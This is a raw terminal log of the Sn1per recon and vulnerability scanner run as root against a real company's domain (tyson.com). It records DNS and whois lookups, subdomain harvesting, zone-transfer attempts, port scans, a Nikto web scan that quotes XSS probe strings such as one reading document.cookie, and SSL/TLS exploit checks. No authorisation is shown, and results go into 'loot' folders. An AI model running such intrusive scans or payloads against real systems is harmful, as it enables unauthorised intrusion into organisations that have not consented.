- root@kali:~# cd /usr/shared/sniper
- bash: cd: /usr/shared/sniper: No such file or directory
- root@kali:~# cd /user/share/sniper
- bash: cd: /user/share/sniper: No such file or directory
- root@kali:~# cd /usr/share/sniper
- root@kali:/usr/share/sniper# sniper tyson.com
- ____
- _________ / _/___ ___ _____
- / ___/ __ \ / // __ \/ _ \/ ___/
- (__ ) / / // // /_/ / __/ /
- /____/_/ /_/___/ .___/\___/_/
- /_/
- + -- --=[http://crowdshield.com
- + -- --=[sniper v2.4 by 1N3
- + -- ----------------------------=[Running Nslookup]=------------------------ -- +
- Server: 10.110.182.1
- Address: 10.110.182.1#53
- Non-authoritative answer:
- Name: tyson.com
- Address: 65.52.220.144
- tyson.com has address 65.52.220.144
- tyson.com mail is handled by 10 pps1.tyson.com.
- tyson.com mail is handled by 10 pps3.tyson.com.
- tyson.com mail is handled by 10 pps4.tyson.com.
- tyson.com mail is handled by 10 pps5.tyson.com.
- tyson.com mail is handled by 10 pps6.tyson.com.
- tyson.com mail is handled by 10 pps2.tyson.com.
- + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
- Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
- [+] Target is tyson.com
- [+] Loading modules.
- [+] Following modules are loaded:
- [x] [1] ping:icmp_ping - ICMP echo discovery module
- [x] [2] ping:tcp_ping - TCP-based ping discovery module
- [x] [3] ping:udp_ping - UDP-based ping discovery module
- [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
- [x] [5] infogather:portscan - TCP and UDP PortScanner
- [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
- [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
- [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
- [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
- [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
- [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
- [x] [12] fingerprint:smb - SMB fingerprinting module
- [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
- [+] 13 modules registered
- [+] Initializing scan engine
- [+] Running scan engine
- [-] ping:tcp_ping module: no closed/open TCP ports known on 65.52.220.144. Module test failed
- [-] ping:udp_ping module: no closed/open UDP ports known on 65.52.220.144. Module test failed
- [-] No distance calculation. 65.52.220.144 appears to be dead or no ports known
- [+] Host: 65.52.220.144 is down (Guess probability: 0%)
- [+] Cleaning up scan engine
- [+] Modules deinitialized
- [+] Execution completed.
- + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
- Whois Server Version 2.0
- Domain names in the .com and .net domains can now be registered
- with many different competing registrars. Go to http://www.internic.net
- for detailed information.
- Domain Name: TYSON.COM
- Registrar: SAFENAMES LTD
- Sponsoring Registrar IANA ID: 447
- Whois Server: whois.safenames.net
- Referral URL: http://www.safenames.net
- Name Server: NS1.TYSON.COM
- Name Server: NS2.TYSON.COM
- Name Server: NS3.TYSON.COM
- Name Server: NS4.TYSON.COM
- Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
- Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Updated Date: 17-may-2017
- Creation Date: 31-may-1995
- Expiration Date: 30-may-2023
- >>> Last update of whois database: 2017-07-14T20:34:46Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- Domain Name: TYSON.COM
- Registry Domain ID: 2232321_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.safenames.net
- Registrar URL: http://www.safenames.net
- Updated Date: 2017-05-17T16:48:01Z
- Creation Date: 1995-05-31T04:00:00Z
- Registrar Registration Expiration Date: 2023-05-30T04:00:00Z
- Registrar: Safenames Ltd
- Registrar IANA ID: 447
- Registrar Abuse Contact Email: abuse@safenames.net
- Registrar Abuse Contact Phone: +44.1908200022
- Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Registry Registrant ID: Not Available From Registry
- Registrant Name: Domain Admin
- Registrant Organisation: Tyson Foods, Inc
- Registrant Street: 2200 W Don Tyson Parkway
- Registrant Street:
- Registrant City: Springdale
- Registrant State/Province: AR
- Registrant Postal Code: 72761
- Registrant Country: US
- Registrant Phone: +1.8006433410
- Registrant Fax:
- Registrant Email: hostmaster@tyson.com
- Registry Admin ID: Not Available From Registry
- Admin Name: International Domain Administrator
- Admin Organisation: Safenames Ltd
- Admin Street: Safenames House, Sunrise Parkway
- Admin Street:
- Admin City: Milton Keynes
- Admin State/Province: Bucks
- Admin Postal Code: MK14 6LS
- Admin Country: UK
- Admin Phone: +44.1908200022
- Admin Fax: +44.1908325192
- Admin Email: hostmaster@safenames.net
- Registry Tech ID: Not Available From Registry
- Tech Name: International Domain Tech
- Tech Organisation: International Domain Tech
- Tech Street: Safenames House, Sunrise Parkway
- Tech Street:
- Tech City: Milton Keynes
- Tech State/Province: Bucks
- Tech Postal Code: MK14 6LS
- Tech Country: UK
- Tech Phone: +44.1908200022
- Tech Fax: +44.1908325192
- Tech Email: tec@safenames.net
- Name Server: NS1.TYSON.COM
- Name Server: NS2.TYSON.COM
- Name Server: NS3.TYSON.COM
- Name Server: NS4.TYSON.COM
- DNSSEC: unsigned
- URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
- >>> Last update of WHOIS database: 2017-05-17T16:48:01Z <<<
- "For more information on Whois status codes, please visit https://icann.org/epp"
- + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.7 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Bing:
- Searching 50 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- [-] Resolving hostnames IPs...
- 69.172.200.241:ir.tyson.com
- 65.52.220.144:projectaplus.tyson.com
- 65.52.220.144:www.tyson.com
- + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
- ; <<>> DiG 9.10.3-P4-Debian <<>> -x tyson.com
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 37910
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;com.tyson.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017042804 1800 900 604800 3600
- ;; Query time: 62 msec
- ;; SERVER: 10.110.182.1#53(10.110.182.1)
- ;; WHEN: Fri Jul 14 16:36:18 EDT 2017
- ;; MSG SIZE rcvd: 119
- dnsenum.pl VERSION:1.2.3
- ----- tyson.com -----
- Host's addresses:
- __________________
- tyson.com. 803 IN A 65.52.220.144
- Name Servers:
- ______________
- ns1.tyson.com. 172698 IN A 199.66.1.33
- ns2.tyson.com. 172698 IN A 199.66.3.34
- ns3.tyson.com. 172698 IN A 199.66.3.33
- ns4.tyson.com. 172698 IN A 199.66.1.34
- Mail (MX) Servers:
- ___________________
- pps2.tyson.com. 28800 IN A 199.66.1.102
- pps2.tyson.com. 28800 IN A 199.66.3.102
- pps3.tyson.com. 28800 IN A 199.66.1.103
- pps3.tyson.com. 28800 IN A 199.66.3.103
- pps4.tyson.com. 28800 IN A 199.66.1.104
- pps4.tyson.com. 28800 IN A 199.66.3.104
- pps1.tyson.com. 28800 IN A 199.66.1.101
- pps1.tyson.com. 28800 IN A 199.66.3.101
- pps6.tyson.com. 28800 IN A 199.66.3.111
- pps6.tyson.com. 28800 IN A 199.66.1.111
- pps5.tyson.com. 28800 IN A 199.66.3.110
- pps5.tyson.com. 28800 IN A 199.66.1.110
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for tyson.com on ns4.tyson.com ...
- AXFR record query failed: REFUSED
- Trying Zone Transfer for tyson.com on ns1.tyson.com ...
- AXFR record query failed: REFUSED
- Trying Zone Transfer for tyson.com on ns3.tyson.com ...
- AXFR record query failed: REFUSED
- Trying Zone Transfer for tyson.com on ns2.tyson.com ...
- AXFR record query failed: REFUSED
- brute force file not specified, bay.
- + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for tyson.com
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- [!] Error: Google probably now is blocking our requests
- [~] Finished now the Google Enumeration ...
- [-] Saving results to file: /usr/share/sniper/loot/domains/domains-tyson.com.txt
- [-] Total Unique Subdomains Found: 122
- ╔═╗╦═╗╔╦╗╔═╗╦ ╦
- ║ ╠╦╝ ║ ╚═╗╠═╣
- ╚═╝╩╚═ ╩o╚═╝╩ ╩
- + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
- [+] Domains saved to: /usr/share/sniper/loot/domains/domains-tyson.com-full.txt
- + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
- ; <<>> DiG 9.10.3-P4-Debian <<>> drdesktop.tyson.com CNAME
- ;drdesktop.tyson.com. IN CNAME
- + -- ----------------------------=[Checking Email Security]=----------------- -- +
- + -- ----------------------------=[Pinging host]=---------------------------- -- +
- PING tyson.com (65.52.220.144) 56(84) bytes of data.
- --- tyson.com ping statistics ---
- 1 packets transmitted, 0 received, 100% packet loss, time 0ms
- + -- ----------------------------=[Running TCP port scan]=------------------- -- +
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-14 16:41 EDT
- Nmap scan report for tyson.com (65.52.220.144)
- Host is up (0.066s latency).
- Not shown: 42 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- 3389/tcp open ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 15.47 seconds
- + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 closed... skipping.
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://tyson.com
- Generic Detection results:
- The site http://tyson.com seems to be behind a WAF or some sort of security solution
- Reason: The server returned a different response code when a string trigged the blacklist.
- Normal response code is "301", while the response code to an attack is "302"
- Number of requests: 16
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- http://tyson.com [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], IP[65.52.220.144], Microsoft-IIS[8.0], RedirectLocation[http://www.tyson.com/], Title[Document Moved], X-Powered-By[ASP.NET]
- http://www.tyson.com/ [200 OK] ASP_NET[4.0.30319][MVC5.1], Country[UNITED STATES][US], HTML5, HTTPServer[Microsoft-IIS/8.0], IP[65.52.220.144], JQuery, Microsoft-IIS[8.0], Script[text/javascript], Title[Tyson | Home], UncommonHeaders[x-aspnetmvc-version], X-Powered-By[ASP.NET], X-UA-Compatible[IE=edge]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: tyson.com:80
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 301 Moved Permanently
- Content-Type: text/html; charset=UTF-8
- Location: http://www.tyson.com/
- Server: Microsoft-IIS/8.0
- X-Powered-By: ASP.NET
- Date: Fri, 14 Jul 2017 20:42:34 GMT
- Content-Length: 144
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/">here</a></body>
- HTTP/1.1 301 Moved Permanently
- Content-Type: text/html; charset=UTF-8
- Location: http://www.tyson.com/
- Server: Microsoft-IIS/8.0
- X-Powered-By: ASP.NET
- Date: Fri, 14 Jul 2017 20:42:34 GMT
- Content-Length: 144
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/">here</a></body>
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on tyson.com...
- + -- --=[Checking if X-Frame options are enabled on tyson.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on tyson.com...
- + -- --=[Checking HTTP methods on tyson.com...
- + -- --=[Checking if TRACE method is enabled on tyson.com...
- + -- --=[Checking for META tags on tyson.com...
- + -- --=[Checking for open proxy on tyson.com...
- + -- --=[Enumerating software on tyson.com...
- Server: Microsoft-IIS/8.0
- X-Powered-By: ASP.NET
- + -- --=[Checking if Strict-Transport-Security is enabled on tyson.com...
- + -- --=[Checking for Flash cross-domain policy on tyson.com...
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/crossdomain.xml">here</a></body>
- + -- --=[Checking for Silverlight cross-domain policy on tyson.com...
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/clientaccesspolicy.xml">here</a></body>
- + -- --=[Checking for HTML5 cross-origin resource sharing on tyson.com...
- + -- --=[Retrieving robots.txt on tyson.com...
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/robots.txt">here</a></body>
- + -- --=[Retrieving sitemap.xml on tyson.com...
- <head><title>Document Moved</title></head>
- <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.tyson.com/sitemap.xml">here</a></body>
- + -- --=[Checking cookie attributes on tyson.com...
- + -- --=[Checking for ASP.NET Detailed Errors on tyson.com...
- <h2>Object moved to <a href="/Unexpected-Error?aspxerrorpath=/?.jsp">here</a>.</h2>
- <section id="error_container">
- <div id="error_detail">
- <div class="error-image"></div>
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 65.52.220.144
- + Target Hostname: tyson.com
- + Target Port: 80
- + Start Time: 2017-07-14 16:46:01 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Microsoft-IIS/8.0
- + Retrieved x-powered-by header: ASP.NET
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Root page / redirects to: http://www.tyson.com/
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + Retrieved x-aspnet-version header: 4.0.30319
- + OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + 7457 requests: 3 error(s) and 10 item(s) reported on remote host
- + End Time: 2017-07-14 17:08:37 (GMT-4) (1356 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/tyson.com-port80.jpg
- + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
- + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
- __[ ! ] Neither war between hackers, nor peace for the system.
- __[ ! ] http://blog.inurl.com.br
- __[ ! ] http://fb.com/InurlBrasil
- __[ ! ] http://twitter.com/@googleinurl
- __[ ! ] http://github.com/googleinurl
- __[ ! ] Current PHP version::[ 7.0.20-2 ]
- __[ ! ] Current script owner::[ root ]
- __[ ! ] Current uname::[ Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.18-1kali1 (2017-04-04) x86_64 ]
- __[ ! ] Current pwd::[ /usr/share/sniper ]
- __[ ! ] Help: php inurlbr.php --help
- ------------------------------------------------------------------------------------------------------------------------
- [ INFO ] INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 161 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://tyson.com
- ERROR:root:Site https://tyson.com appears to be down
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- /usr/share/whatweb/lib/target.rb:189: warning: constant ::TimeoutError is deprecated
- https://tyson.com ERROR: Connection reset by peer - SSL_connect
- + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
- AVAILABLE PLUGINS
- -----------------
- PluginSessionRenegotiation
- PluginChromeSha1Deprecation
- PluginHSTS
- PluginHeartbleed
- PluginCertInfo
- PluginOpenSSLCipherSuites
- PluginSessionResumption
- PluginCompression
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- tyson.com:443 => 65.52.220.144:443
- SCAN RESULTS FOR TYSON.COM:443 - 65.52.220.144:443
- --------------------------------------------------
- Unhandled exception when processing --compression:
- utils.SSLyzeSSLConnection.SSLHandshakeRejected - TCP / Received RST
- Unhandled exception when processing --reneg:
- utils.SSLyzeSSLConnection.SSLHandshakeRejected - TCP / Received RST
- * Session Resumption:
- With Session IDs: ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
- ERROR #1: SSLHandshakeRejected - TCP / Received RST
- ERROR #2: SSLHandshakeRejected - TCP / Received RST
- ERROR #3: SSLHandshakeRejected - TCP / Received RST
- ERROR #4: SSLHandshakeRejected - TCP / Received RST
- ERROR #5: SSLHandshakeRejected - TCP / Received RST
- With TLS Session Tickets: ERROR: SSLHandshakeRejected - TCP / Received RST
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- Unhandled exception when processing --certinfo:
- utils.SSLyzeSSLConnection.SSLHandshakeRejected - TCP / Received RST
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- ECDHE-ECDSA-RC4-SHA timeout - timed out
- ECDH-RSA-RC4-SHA timeout - timed out
- ECDH-ECDSA-NULL-SHA timeout - timed out
- DHE-RSA-CAMELLIA128-SHA timeout - timed out
- DHE-DSS-SEED-SHA timeout - timed out
- DHE-DSS-CAMELLIA128-SHA timeout - timed out
- DH-RSA-CAMELLIA128-SHA timeout - timed out
- DH-DSS-AES128-SHA timeout - timed out
- AECDH-RC4-SHA timeout - timed out
- SCAN COMPLETED IN 34.87 S
- -------------------------
- Version: 1.11.9-static
- OpenSSL 1.0.2l-dev xx XXX xxxx
- Testing SSL server tyson.com on port 443 using SNI name tyson.com
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- ###########################################################
- testssl 2.9dev from https://testssl.sh/dev/
- This program is free software. Distribution and
- modification under GPLv2 permitted.
- USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
- Please file bugs @ https://testssl.sh/bugs/
- ###########################################################
- Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
- on kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
- (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
- Start 2017-07-14 17:10:49 -->> 65.52.220.144:443 (tyson.com) <<--
- rDNS (65.52.220.144): --
- 65.52.220.144:443 doesn't seem to be a TLS/SSL enabled server
- The results might look ok but they could be nonsense. Really proceed ? ("yes" to continue) --> yes
- Service detected: Couldn't determine what's running on port 443, assuming no HTTP service => skipping all HTTP checks
- Testing protocols via sockets except SPDY+HTTP2
- SSLv2 not offered (OK)
- SSLv3 not offered (OK)
- TLS 1 not offered
- TLS 1.1 not offered
- TLS 1.2 not offered
- SPDY/NPN (SPDY is an HTTP protocol and thus not tested here)
- HTTP2/ALPN (HTTP/2 is a HTTP protocol and thus not tested here)
- Testing ~standard cipher categories
- NULL ciphers (no encryption) not offered (OK)
- Anonymous NULL Ciphers (no authentication) not offered (OK)
- Export ciphers (w/o ADH+NULL) not offered (OK)
- LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
- Weak 128 Bit ciphers not offered (OK)
- Triple DES Ciphers (Medium) not offered (OK)
- High grade encryption not offered
- Strong grade encryption (AEAD ciphers) not offered
- Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
- No ciphers supporting Forward Secrecy offered
- Testing server preferences
- Has server cipher order? no matching cipher in this list found (pls report this): DES-CBC3-SHA:RC4-MD5:DES-CBC-SHA:RC4-SHA:AES128-SHA:AES128-SHA256:AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:ECDH-RSA-DES-CBC3-SHA:ECDH-RSA-AES128-SHA:ECDH-RSA-AES256-SHA:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:DHE-DSS-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:AES256-SHA256 .
- y
- Testing server defaults (Server Hello)
- TLS extensions (standard) (none)
- Session Tickets RFC 5077 (none)
- SSL Session ID support yes
- Session Resumption Ticket: no extension=no resumption, ID resumption test failed, pls report
- TLS clock skew SSLv3 through TLS 1.2 didn't return a timestamp
- Testing vulnerabilities
- Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
- CCS (CVE-2014-0224) not vulnerable (OK)
- Ticketbleed (CVE-2016-9244), experiment. -- (applicable only for HTTPS)
- Secure Renegotiation (CVE-2009-3555) handshake didn't succeed
- Secure Client-Initiated Renegotiation not vulnerable (OK)
- CRIME, TLS (CVE-2012-4929) test failed (couldn't connect)
- POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
- TLS_FALLBACK_SCSV (RFC 7507) No fallback possible, TLS 1.2 is the only protocol (OK)
- SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
- FREAK (CVE-2015-0204) not vulnerable (OK)
- DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this port (OK)
- no RSA certificate, thus certificate can't be used with SSLv2 elsewhere
- LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
- BEAST (CVE-2011-3389) no SSL3 or TLS1 (OK)
- LUCKY13 (CVE-2013-0169) not vulnerable (OK)
- RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
- Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- Done 2017-07-14 17:24:59 [ 853s] -->> 65.52.220.144:443 (tyson.com) <<--
- + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
- + -- --=[Checking for DROWN (SSLv2): 65.52.220.144:443
- + -- --=[Checking for HeartBleed: 65.52.220.144:443
- + -- --=[Checking for OpenSSL CCS: 65.52.220.144:443
- sysread error: Connection reset by peer
- + -- --=[Checking for Poodle (SSLv3): 65.52.220.144:443
- + -- --=[Checking for WinShock (MS14-066): 65.52.220.144:443
- Testing if OpenSSL supports the ciphers we are checking for: YES
- Testing 65.52.220.144:443 for availability of SSL ciphers added in MS14-066...
- Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
- Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
- Testing cipher AES256-GCM-SHA384: UNSUPPORTED
- Testing cipher AES128-GCM-SHA256: UNSUPPORTED
- Testing if IIS is running on port 443: NO
- Checking if target system is running Windows Server 2012 or later...
- Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
- Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
- 65.52.220.144:443 is patched: NO
- + -- --=[Scan Complete!
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on tyson.com...
- + -- --=[Checking if X-Frame options are enabled on tyson.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on tyson.com...
- + -- --=[Checking HTTP methods on tyson.com...
- + -- --=[Checking if TRACE method is enabled on tyson.com...
- + -- --=[Checking for META tags on tyson.com...
- + -- --=[Checking for open proxy on tyson.com...
- + -- --=[Enumerating software on tyson.com...
- + -- --=[Checking if Strict-Transport-Security is enabled on tyson.com...
- + -- --=[Checking for Flash cross-domain policy on tyson.com...
- + -- --=[Checking for Silverlight cross-domain policy on tyson.com...
- + -- --=[Checking for HTML5 cross-origin resource sharing on tyson.com...
- + -- --=[Retrieving robots.txt on tyson.com...
- + -- --=[Retrieving sitemap.xml on tyson.com...
- + -- --=[Checking cookie attributes on tyson.com...
- + -- --=[Checking for ASP.NET Detailed Errors on tyson.com...
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + No web server found on tyson.com:443
- ---------------------------------------------------------------------------
- + 0 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/tyson.com-port443.jpg
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 2049 closed... skipping.
- + -- --=[Port 2121 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3310 closed... skipping.
- + -- --=[Port 3128 closed... skipping.
- + -- --=[Port 3389 opened... running tests...
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-14 17:28 EDT
- Stats: 0:00:14 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
- Ping Scan Timing: About 100.00% done; ETC: 17:28 (0:00:00 remaining)
- Nmap scan report for tyson.com (65.52.220.144)
- Host is up (0.0074s latency).
- PORT STATE SERVICE VERSION
- 3389/tcp open ms-wbt-server?
- |_rdp-enum-encryption: Packet too short
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: bridge
- Running: Oracle Virtualbox
